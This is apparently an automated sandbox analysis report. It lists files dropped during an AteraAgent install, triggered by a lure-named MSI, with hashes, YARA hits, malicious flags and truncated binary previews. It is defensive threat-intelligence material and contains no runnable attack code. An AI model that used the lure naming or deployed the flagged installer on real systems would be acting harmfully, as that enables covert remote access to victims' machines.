                                                                                                                                                                                                                                        SSDEEP:12288:3BARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTUU:3BA/ZTvQD0XY0AJBSjRlXP36RMGV
                                                                                                                                                                                                                                        MD5:2C4D25B7FBD1ADFD4471052FA482AF72
                                                                                                                                                                                                                                        SHA1:FD6CD773D241B581E3C856F9E6CD06CB31A01407
                                                                                                                                                                                                                                        SHA-256:2A7A84768CC09A15362878B270371DAAD9872CAACBBEEBE7F30C4A7ED6C03CA7
                                                                                                                                                                                                                                        SHA-512:F7F94EC00435466DB2FB535A490162B906D60A3CFA531A36C4C552183D62D58CCC9A6BB8BBFE39815844B0C3A861D3E1F1178E29DBCB6C09FA2E6EBBB7AB943A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ......J.....`.....................................O.......................0(.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        4c9999.rbf (copy)

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):602672
                                                                                                                                                                                                                                        Entropy (8bit):6.145404526272746
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:UShQrHBJEwJiIJJ8TihsEWdzs29glRleqn4uRTJgwhVHhoNw0r17K7DDaiC3KM+9:gHDxJGihsEKwSuTuwvOWgFA
                                                                                                                                                                                                                                        MD5:17D74C03B6BCBCD88B46FCC58FC79A0D
                                                                                                                                                                                                                                        SHA1:BC0316E11C119806907C058D62513EB8CE32288C
                                                                                                                                                                                                                                        SHA-256:13774CC16C1254752EA801538BFB9A9D1328F8B4DD3FF41760AC492A245FBB15
                                                                                                                                                                                                                                        SHA-512:F1457A8596A4D4F9B98A7DCB79F79885FA28BD7FC09A606AD3CD6F37D732EC7E334A64458E51E65D839DDFCDF20B8B5676267AA8CED0080E8CF81A1B2291F030
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X............." ..0............." ... ...@....... ....................................`.....................................O....@..|...............0(...`..........T............................................ ............... ..H............text...(.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`......................@..B................. ......H............{..................x.......................................r.(......}......}......}....*....0..,........-..{.....o...+.+..{.....{....s.....o...+..*V.(......}......}....*...0...................-..+..o....s"........o$......o,....,..o....,...,....o(........,...oH...,...o......+.......9......o....,..{......o....o....o......s..........o&...8.....{......o....o........9e.....o.....?X.....r...po....9G.....r...po....o....r...p.( ...9&.....r...po....9......r...po....o.....

                                                                                                                                                                                                                                        4c999a.rbf (copy)

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):73264
                                                                                                                                                                                                                                        Entropy (8bit):5.954475034553661
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:6784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRq:67N1r9KGI04CCARLq
                                                                                                                                                                                                                                        MD5:F4D9D65581BD82AF6108CFA3DD265A9A
                                                                                                                                                                                                                                        SHA1:A926695B1E5D3842D8345C56C087E58845307A16
                                                                                                                                                                                                                                        SHA-256:A3219CD30420EBCF7507C9C9F92FD551AE19999BE247CAA861A8A22D265BE379
                                                                                                                                                                                                                                        SHA-512:144C1195A440907592B22FC947F4284CA36869BDAE495EC8CA5212AF4F63E8E8492FB0EC3B37BF66DB912AF30864C69588D0E35ED9B3D24D36DF3B09DDB5B6C3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.Z.........." ..0.................. ... ....... .......................`.......f....@.....................................O.... ..P...............0(...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@......................@..B........................H.......$...h...........................................................6..o.........*f..o...........o.........*...o...........o...........o.........*...o...........o ..........o!...........o"........*...o#..........o$..........o%...........o&...........o'........*....0..L.........o(..........o)..........o*...........o+...........o,...........o-........*.0..Y.........o...........o/..........o0...........o1...........o2...........o3...........o4.... ...*....0..k.........o5....

                                                                                                                                                                                                                                        4c999b.rbf (copy)

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3318832
                                                                                                                                                                                                                                        Entropy (8bit):6.534876879948643
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:yIBbo0WIgmjljFtXCdRLRBcJd+KaGxHIkMNqzP56O8lZ7qXUqi9p:DBbBWIgWljGxRB/LLp
                                                                                                                                                                                                                                        MD5:11CC798BAFA45BE12D27C68D6B59BA27
                                                                                                                                                                                                                                        SHA1:4D1CA0C0F1BC3691F5F852CC8D3ED88605B70434
                                                                                                                                                                                                                                        SHA-256:443A1C088E62810A954FFE9F0136F7A8D5E44928425D23B5284D936270D9837A
                                                                                                                                                                                                                                        SHA-512:FA0AEAF5309FD1593DB8AF774F18AA9CDA9B7ABD3F32D34CFD1B615EE68CECA0155DFB0AB7351E182B1B9D872BF41B19E66D2B597D2BA6300AF332A0F525C75A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....R............" ..0..r2..........&1.. ....2...... ........................2.....i.3...@.................................G&1.O.....2..............|2.0(....2.....X.(.p............................................ ............... ..H............text....p2.. ...r2................. ..`.rsrc.........2......t2.............@..@.reloc........2......z2.............@..B................{&1.....H...........$....................(.....................................V!........s.........*.~....-*(....o....o....o.........~....-.~.........~....*..( ...*...0..G.......(!....o"....s.1....s*,..%..(.... ....o.....o 0...Zo....t....o8(..(....*..0..$..........(.....(....o.....(!.......io#...*z...(....(!....o"...o....(....*..0............T....r...p.(O....o$....(....*..0..I.......sG...sB)..s.(..s.(...(....s6(....,..o%....2...(....sV(....+.....%..ox...*..( ...*V.(&.....}......}..

                                                                                                                                                                                                                                        C:\Config.Msi\4c998f.rbs

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):8889
                                                                                                                                                                                                                                        Entropy (8bit):5.667192466509971
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:mjBxz1ccbTOOeMeSD61k7r6IHfk7r6kAVv70HVotBVeZEmzmYpLAV77tGpY9rr:mVD2fQpQtiB2iH
                                                                                                                                                                                                                                        MD5:6024D3CC7D74C3AEEB3C018B1EA6944E
                                                                                                                                                                                                                                        SHA1:6FD5F448E617D24520925000A1BCB5955FAEB501
                                                                                                                                                                                                                                        SHA-256:2D2C8B740E6FFEC781B7B9DD64BEFD884C0D98F70AB0B506C63C932939A82519
                                                                                                                                                                                                                                        SHA-512:BE010F39BF3B061119849BAFE87F0557799B144B4414738DAF54FB3F9B59837AD8BC4400D86DE1CB02BC7B934E06AAE6F8AA2737F978FDC18CA7FEDF9FFA968F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Config.Msi\4c998f.rbs, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...@IXOS.@.....@<OBY.@.....@.....@.....@.....@.....@......&.{E732A0D7-A2F2-4657-AC41-B19742648E45}..AteraAgent,.TRABALHO----PROCESSO0014S55-S440000000S1.msi.@.....@.....@.....@........&.{721AD955-79FD-4019-BBF5-9DCC4C1175BB}.....@.....@.....@.....@.......@.....@.....@.......@......AteraAgent......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....StopAteraServiceQuiet....KillAteraTaskQuiet....ProcessComponents..Updating component registration..&.{F7DFE9BA-9FAD-11DA-9578-00E08161165F}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{C8C868DC-3A5E-4180-A7BB-03D6282966CB}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{0EC8B23C-C723-41E1-9105-4B9C2CDAD47A}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{F1B1B9D1-F1B0-420C-9D93-F04E9BD4795D}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{5F95F700-DCA4-4880-B2D2-891AE0D6E1A3}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{F62C52BA-15C7-4C3D-AAB2-DE65004F9665}&.{E732A0D7-A2F2-4657-AC41-B19742

                                                                                                                                                                                                                                        C:\Config.Msi\4c9994.rbs

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):9555
                                                                                                                                                                                                                                        Entropy (8bit):5.573697818656053
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:djBGZcRqFbLCsgRqQbLCMDp17qEVl0FfLALtyD0qagukGGhaKfmbHt1fqykkrEcZ:dVjRwgRpdMKK7yhT
                                                                                                                                                                                                                                        MD5:66087B1EDCF98C0ADD4B6F959FD48EF2
                                                                                                                                                                                                                                        SHA1:5B4C8E26B6A4D320492289154097F421FB37185A
                                                                                                                                                                                                                                        SHA-256:724DABDA314BB01314EDFB3AF60BAC905877EB5854F30217DBFFD97ECE456FCE
                                                                                                                                                                                                                                        SHA-512:99F0B2F8019A0A413BA1ED142CC775B0C714EF7C67973C0EBB1664C8AEBE98E7D08099DA5AAA709501569A0B13DA66A3851311D4334F37AC40AC72745AEBD3C3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Config.Msi\4c9994.rbs, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...@IXOS.@.....@eOBY.@.....@.....@.....@.....@.....@......&.{E732A0D7-A2F2-4657-AC41-B19742648E45}..AteraAgent,.TRABALHO----PROCESSO0014S55-S440000000S1.msi.@.....@.....@.....@........&.{721AD955-79FD-4019-BBF5-9DCC4C1175BB}.....@.....@.....@.....@.......@.....@.....@.......@......AteraAgent......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....InstallInitialize$..@....z.Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\7D0A237E2F2A7564CA141B792446E854\Transforms...@....(.$..@....@.Software\Microsoft\Windows\CurrentVersion\Installer\TempPackages...@....(.&...C:\Windows\Installer\4c9990.msi..#0$..@......Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\7D0A237E2F2A7564CA141B792446E854\InstallPropertiesx.....\...l.............H.........?...................9...................?........... ... ........... ... ................@....%...AuthorizedCDFPrefix%...Comments%...Contact%...DisplayVersio

                                                                                                                                                                                                                                        C:\Config.Msi\4c999c.rbs

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):8767
                                                                                                                                                                                                                                        Entropy (8bit):5.653399727426775
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:Xy7wo+fncHMeR1c6ITc6k7s5VNpkxYpLso:XPo+fncHzcVctSNpkcP
                                                                                                                                                                                                                                        MD5:A32F96C216B713E05E7734D5545EA9B8
                                                                                                                                                                                                                                        SHA1:D7D1B63286DF76465259D52E1B85CCC52FD8613E
                                                                                                                                                                                                                                        SHA-256:CAEF7119893DD24CFDA118E436CE556DB0EC54F9DDBAB436745DEB4D202E7C4A
                                                                                                                                                                                                                                        SHA-512:DD797B9F165679B9E00BA7B93DBE3931DD9B8A1993040F625CB00EDF4D572B1C25AA41B0B5DD66D0D98CC815832FCF57CD50EFB70BB81170348908EEE58AD372
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Config.Msi\4c999c.rbs, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...@IXOS.@.....@jOBY.@.....@.....@.....@.....@.....@......&.{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}..AteraAgent..ateraAgentSetup64_1_8_7_2.msi.@.....@.....@.....@........&.{911E9E2F-B38D-4D02-A148-5E49FC9D8943}.....@.....@.....@.....@.......@.....@.....@.......@......AteraAgent......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....StopAteraServiceQuiet....KillAteraTaskQuiet....ProcessComponents..Updating component registration..&.{F7DFE9BA-9FAD-11DA-9578-00E08161165F}&.{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}.@......&.{C8C868DC-3A5E-4180-A7BB-03D6282966CB}&.{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}.@......&.{0EC8B23C-C723-41E1-9105-4B9C2CDAD47A}&.{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}.@......&.{F1B1B9D1-F1B0-420C-9D93-F04E9BD4795D}&.{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}.@......&.{5F95F700-DCA4-4880-B2D2-891AE0D6E1A3}&.{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}.@......&.{F62C52BA-15C7-4C3D-AAB2-DE65004F9665}&.{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}.@......

                                                                                                                                                                                                                                        C:\Config.Msi\4c99a0.rbs

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):57458
                                                                                                                                                                                                                                        Entropy (8bit):5.860419906873573
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:Pg8kxUr9O4QafETLKEpMzsMxlNPF73hXqiRuT2oKUG5aE/We6pEFfEojISLQTpfZ:9QSG
                                                                                                                                                                                                                                        MD5:9412E11E7E3B022B839461B374D67B38
                                                                                                                                                                                                                                        SHA1:DDB2E433C3B2F886FA86B6EF874E5DA220420942
                                                                                                                                                                                                                                        SHA-256:BF80134D54CC38A0D2A6CAADCD53DAE33A8454F988E422432DC3DDF2FEDA8F0F
                                                                                                                                                                                                                                        SHA-512:052C4AFD2394123E4E507FD381FDDB57301BAC73A21E6B3917B935291861D9274CB26E23541CC45DF537D034C57B34D2EF2DEB23A8DC04CCB747C6D48B5AB462
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...@IXOS.@.....@pOBY.@.....@.....@.....@.....@.....@......&.{3FDCF0A2-7C1F-41C7-9749-0D91EC216AED}%.Microsoft .NET Runtime - 6.0.32 (x64)!.dotnet-runtime-6.0.32-win-x64.msi.@.....@gA.0.@.....@........&.{81A6B662-3AB0-42DC-AE22-74E8036F80FA}.....@.....@.....@.....@.......@.....@.....@.......@....%.Microsoft .NET Runtime - 6.0.32 (x64)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{3B053811-15BE-513E-9DEC-B2B5C4918267}&.{3FDCF0A2-7C1F-41C7-9749-0D91EC216AED}.@......&.{12C6BE75-4A6B-5D0E-8906-981484BEDEFB}&.{3FDCF0A2-7C1F-41C7-9749-0D91EC216AED}.@......&.{5B8B7A30-DD32-5F3F-BF38-4CDA80FF7B58}&.{3FDCF0A2-7C1F-41C7-9749-0D91EC216AED}.@......&.{2D57BD37-A665-5E90-A9D0-150D1AE6247E}&.{3FDCF0A2-7C1F-41C7-9749-0D91EC216AED}.@......&.{6F6135D1-D37B-59EE-915A-2CCBA1F18027}&.{3FDCF0A2-7C1F-41C7-9749-0D91EC216AED}.@......&.{07C0B213-96A0-54A8-8375-7897382BD558}&.{3FDCF0A2-7C1F-41C7-9749-0D91EC216A

                                                                                                                                                                                                                                        C:\Config.Msi\4c99a4.rbs

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):9062
                                                                                                                                                                                                                                        Entropy (8bit):5.59988327757456
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:tImbnPKC5jc2KeU3N35rUqeD2+PZCsTlYUqeD2+PZC6jcS3Y30YlTlWYhIKE535K:DjKiY/e6Yv8IFv8t/EjANmWph
                                                                                                                                                                                                                                        MD5:8AE857859655D374345F00D34D08CF9B
                                                                                                                                                                                                                                        SHA1:F8AF1D77EA1DFA8B11A44C406D7FAA97797EE064
                                                                                                                                                                                                                                        SHA-256:FB200EF78CF58D666A7C46E1890023ED04BAC79FCB7DBD237EA5D7D293CE73A9
                                                                                                                                                                                                                                        SHA-512:10BF97D5398F4F7D02D506CDC23E51161B6E9A0BAAAB598216EA004C164AFAC7AFF77E3F2C46D679BDF6C136FE5819749BC42CB104209BBD7616536239A3E20F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...@IXOS.@.....@vOBY.@.....@.....@.....@.....@.....@......&.{667CB653-70E1-4E2B-9C8E-6A02A6CF88B9}..Microsoft .NET Host FX Resolver - 6.0.32 (x64)!.dotnet-hostfxr-6.0.32-win-x64.msi.@.....@gA.0.@.....@........&.{43DA5864-E85C-44A5-B8EC-4BB554FA8AFC}.....@.....@.....@.....@.......@.....@.....@.......@......Microsoft .NET Host FX Resolver - 6.0.32 (x64)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{E116E585-E2CE-5BAC-A645-7047860785B2}&.{667CB653-70E1-4E2B-9C8E-6A02A6CF88B9}.@......&.{0AC899A6-3CC6-559F-9577-67925851F466}&.{667CB653-70E1-4E2B-9C8E-6A02A6CF88B9}.@......&.{8EC524B8-7864-5ACE-B320-2D36216EBC12}&.{667CB653-70E1-4E2B-9C8E-6A02A6CF88B9}.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]..(.C:\Program Files\dotnet\host\fxr\6.0.32\....3.C:\Program Files\dotnet\host\fxr\6.0.32\hostfxr.dll....WriteRegistryValues..Writing system registry values..Key:

                                                                                                                                                                                                                                        C:\Config.Msi\4c99a8.rbs

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):10280
                                                                                                                                                                                                                                        Entropy (8bit):5.6131358652055106
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:kQUZRj2S8ln+sejxMYN8IlN8di8k/zEYW9NYX1udXkZWpImoCKSBy5Y:kBZRj2S6iN9NJC
                                                                                                                                                                                                                                        MD5:809B54311F93477288995D94A912B090
                                                                                                                                                                                                                                        SHA1:6320BAFB8031C46F6760C338F25B388519586FDB
                                                                                                                                                                                                                                        SHA-256:19F7A1F7E4DE6C329573C5330D0173F66348A824D3B71FC98FA3AF2880A18705
                                                                                                                                                                                                                                        SHA-512:B2C00B71CD94FFA9680D5DA6E8F16A33A985733398F5E93B2BA308839C2D5A4BE6AAF2D2F6066AA3ACE6E9ADDEB2FD24CDB74CCCFAA4877D61E2774C4DC5EBEB
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...@IXOS.@.....@wOBY.@.....@.....@.....@.....@.....@......&.{A09F8381-88C3-44C4-9DAB-AC44F4F4DB4B}".Microsoft .NET Host - 6.0.32 (x64)..dotnet-host-6.0.32-win-x64.msi.@.....@gA.0.@.....@........&.{6CC46603-A43D-40BF-9045-9949A2B95632}.....@.....@.....@.....@.......@.....@.....@.......@....".Microsoft .NET Host - 6.0.32 (x64)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{3AB1371A-161F-5BD9-98C8-F9BF7A103CA5}&.{A09F8381-88C3-44C4-9DAB-AC44F4F4DB4B}.@......&.{45399BBB-DDA5-4386-A2E9-618FB3C54A18}&.{A09F8381-88C3-44C4-9DAB-AC44F4F4DB4B}.@......&.{EA9C3F98-F9B1-5212-8980-CFEAF2B15E0D}&.{A09F8381-88C3-44C4-9DAB-AC44F4F4DB4B}.@......&.{E4E008C8-57A8-5040-BB34-03024B15B6C5}&.{A09F8381-88C3-44C4-9DAB-AC44F4F4DB4B}.@......&.{CE35924C-AD31-51DF-B84A-A8052ED08400}&.{A09F8381-88C3-44C4-9DAB-AC44F4F4DB4B}.@......&.{A61CBE5B-1282-4F29-90AD-63597AA2372E}&.{A09F8381-88C3-44C4-9DAB-AC44F4F4DB4B}.@....

                                                                                                                                                                                                                                        C:\Config.Msi\4c99ab.rbs

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3816
                                                                                                                                                                                                                                        Entropy (8bit):5.059989718903799
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:QmM5sne4etTlxm7epQfTlxmpQ6WSiiRIy:lSyenk47
                                                                                                                                                                                                                                        MD5:DF0781F0395A3CD0EA421CAA956E8B08
                                                                                                                                                                                                                                        SHA1:24F13C8F79E827AE2C0764DDF086D5851512CACE
                                                                                                                                                                                                                                        SHA-256:8B1635ED5EA835226C57551BB1FEAEF8C5BB05CDD84201B3B231DC4E311CA736
                                                                                                                                                                                                                                        SHA-512:1B4B5655B25B3B2F937EBE51E10C459D7DFA94E531ED552BD1EDBAB2AB52FE4639D8AEE636C4ADB29DE09CB3C568FA99BE593F77DBE37599ED997B2F95B9D526
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...@IXOS.@.....@xOBY.@.....@.....@.....@.....@.....@......&.{3FDCF0A2-7C1F-41C7-9749-0D91EC216AED}%.Microsoft .NET Runtime - 6.0.32 (x64)!.dotnet-runtime-6.0.32-win-x64.msi.@.....@gA.0.@.....@........&.{81A6B662-3AB0-42DC-AE22-74E8036F80FA}.....@.....@.....@.....@.......@.....@.....@.......@....%.Microsoft .NET Runtime - 6.0.32 (x64)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....RegisterProduct..Registering product..[1]$..@......Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\2A0FCDF3F1C77C147994D019CE12A6DE\InstallPropertiesx.....\...l.............H.........?...................9...................?........... ... ........... ... ................@....$..@....3.Software\Microsoft\Windows\CurrentVersion\Uninstall.............................................. ...!................... ...!.......?........... ... ................... ... .......?.......................................?.............................

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):753
                                                                                                                                                                                                                                        Entropy (8bit):4.853078320826549
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:qLLYem7haYNem7hcomf3em7hUQLtygXnC9xkKxeCsx/Yem7haYNem7hcomf3em7B:qLUVhzVhM3VhdLtXXIxkKxeCsOVhzVhY
                                                                                                                                                                                                                                        MD5:8298451E4DEE214334DD2E22B8996BDC
                                                                                                                                                                                                                                        SHA1:BC429029CC6B42C59C417773EA5DF8AE54DBB971
                                                                                                                                                                                                                                        SHA-256:6FBF5845A6738E2DC2AA67DD5F78DA2C8F8CB41D866BBBA10E5336787C731B25
                                                                                                                                                                                                                                        SHA-512:CDA4FFD7D6C6DFF90521C6A67A3DBA27BF172CC87CEE2986AE46DCCD02F771D7E784DCAD8AEA0AD10DECF46A1C8AE1041C184206EC2796E54756E49B9217D7BA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.Installing assembly 'C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe'...Affected parameters are:.. logtoconsole = .. assemblypath = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe.. logfile = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog..Installing service AteraAgent.....Service AteraAgent has been successfully installed...Creating EventLog source AteraAgent in log Application.....Committing assembly 'C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe'...Affected parameters are:.. logtoconsole = .. assemblypath = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe.. logfile = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallState

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (7463), with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):7466
                                                                                                                                                                                                                                        Entropy (8bit):5.1606801095705865
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:R3DrP/zatgCnNjn1x62muDr9aHmzcv/65m7JDcm0BefnanGEkn56vT4ZvR++JDr+:NexdYX7OSRjXsaA0Ndhi
                                                                                                                                                                                                                                        MD5:362CE475F5D1E84641BAD999C16727A0
                                                                                                                                                                                                                                        SHA1:6B613C73ACB58D259C6379BD820CCA6F785CC812
                                                                                                                                                                                                                                        SHA-256:1F78F1056761C6EBD8965ED2C06295BAFA704B253AFF56C492B93151AB642899
                                                                                                                                                                                                                                        SHA-512:7630E1629CF4ABECD9D3DDEA58227B232D5C775CB480967762A6A6466BE872E1D57123B08A6179FE1CFBC09403117D0F81BC13724F259A1D25C1325F1EAC645B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
